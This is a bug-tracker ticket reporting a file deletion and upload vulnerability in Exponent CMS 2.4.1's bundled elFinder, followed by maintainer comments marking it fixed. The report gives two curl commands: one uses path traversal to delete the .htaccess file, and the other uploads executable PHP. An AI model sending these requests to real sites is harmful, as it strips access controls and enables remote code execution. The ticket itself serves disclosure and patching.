
Exponent CMS 2.4.1 - Unrestricted File Deletion / Upload Vulnerability in elFinder
Reported by mm | January 10th, 2017 @ 04:52 PM | in 2.4.2 (closed)
Allows deleting arbitrary files and thus bypassing .htaccess restrictions on uploadable executable PHP files due to a flaw in external/elFinder/php/elFinder.class.php
Example:
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F
"cmd=upload" -F "target=l1_" -F "upload[]=" -F
chunk="../[exponent]/files/.htaccess"
curl "[exponent]/framework/modules/file/connector/elfinder.php" -F "cmd=upload" -F "target=l1_" -F "upload[]=@[remote code]"
Comments and changes to this ticket
-
dleffler January 11th, 2017 @ 07:58 PM
- State changed from new to open
- Tag set to security
- Assigned user changed from expNinja to dleffler
- Milestone set to 2.4.2
Issue has been addressed in 333rd party library and will be applied to exponent as soon as feasible https://github.com/Studio-42/elFinder/issues/1843
-
dleffler January 14th, 2017 @ 03:05 AM
- State changed from open to resolved
Fixed by recent push to update elFinder to v2.1.20
Please Sign in or create a free account to add a new ticket.
With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.